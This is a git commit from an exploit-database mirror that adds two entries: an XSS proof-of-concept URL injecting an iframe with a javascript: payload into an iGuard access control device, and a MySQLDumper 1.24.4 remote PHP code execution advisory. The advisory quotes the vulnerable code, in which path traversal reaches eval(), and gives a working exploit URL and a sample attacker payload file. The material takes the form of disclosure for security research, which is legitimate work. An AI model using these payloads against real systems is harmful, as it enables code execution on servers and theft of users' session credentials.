DB: 2015-05-29
2 new exploits
This commit is contained in:
Offensive Security
parent
c2a15a0750
commit
3f78695204
3 changed files with 92 additions and 0 deletions
|
|
@ -33513,3 +33513,5 @@ id,file,description,date,author,platform,type,port
|
|||
37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
|
||||
37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
|
||||
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 'menu.php' Remote PHP Code Execution Vulnerability",2012-04-27,AkaStep,php,webapps,0
|
||||
37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting Vulnerability",2012-05-02,"Usman Saeed",hardware,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
7
platforms/hardware/webapps/37135.txt
Executable file
7
platforms/hardware/webapps/37135.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/53355/info
|
||||
|
||||
iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp
|
||||
83
platforms/php/webapps/37134.php
Executable file
83
platforms/php/webapps/37134.php
Executable file
|
|
@ -0,0 +1,83 @@
|
|||
source: http://www.securityfocus.com/bid/53310/info
|
||||
|
||||
MySQLDumper is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
Vulnerable code section:
|
||||
/*
|
||||
//menu.php
|
||||
if (isset($_POST['selected_config'])||isset($_GET['config']))
|
||||
{
|
||||
if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
|
||||
// Configuration was switched in content frame?
|
||||
if (isset($_GET['config'])) $new_config=$_GET['config'];
|
||||
// restore the last active menuitem
|
||||
if (is_readable($config['paths']['config'].$new_config.'.php'))
|
||||
{
|
||||
clearstatcache();
|
||||
unset($databases);
|
||||
$databases=array();
|
||||
if (read_config($new_config))
|
||||
{
|
||||
$config['config_file']=$new_config;
|
||||
$_SESSION['config_file']=$new_config; //$config['config_file'];
|
||||
$config_refresh='
|
||||
<script language="JavaScript" type="text/javascript">
|
||||
if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
|
||||
{
|
||||
var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
|
||||
}
|
||||
else selected_div=\'\';
|
||||
parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
|
||||
}
|
||||
if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
*/
|
||||
As you can see we can traverse it +
|
||||
|
||||
if we will look to read_config() function
|
||||
//inc/functions_global.php
|
||||
|
||||
function read_config($file=false)
|
||||
{
|
||||
global $config,$databases;
|
||||
$ret=false;
|
||||
if (!$file) $file=$config['config_file'];
|
||||
// protect from including external files
|
||||
$search=array(':', 'http', 'ftp', ' ');
|
||||
$replace=array('', '', '', '');
|
||||
$file=str_replace($search,$replace,$file);
|
||||
|
||||
if (is_readable($config['paths']['config'].$file.'.php'))
|
||||
{
|
||||
// to prevent modern server from caching the new configuration we need to evaluate it this way
|
||||
clearstatcache();
|
||||
$f=implode('',file($config['paths']['config'].$file.'.php'));
|
||||
$f=str_replace('<?php','',$f);
|
||||
$f=str_replace('?>','',$f);
|
||||
eval($f);
|
||||
$config['config_file']=$file;
|
||||
$_SESSION['config_file']=$config['config_file'];
|
||||
$ret=true;
|
||||
}
|
||||
return $ret;
|
||||
}
|
||||
|
||||
this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))
|
||||
|
||||
Our exploit:
|
||||
http://www.example.com/learn/cubemail/menu.php?config=../../ss
|
||||
where ss = ss.php
|
||||
#cat ss.php # in eg attacker uploaded his/her own file:
|
||||
echo 'Our command executed ' . getcwd();
|
||||
phpinfo();
|
||||
|
||||
|
||||
|
||||
Loading…
Add table
Reference in a new issue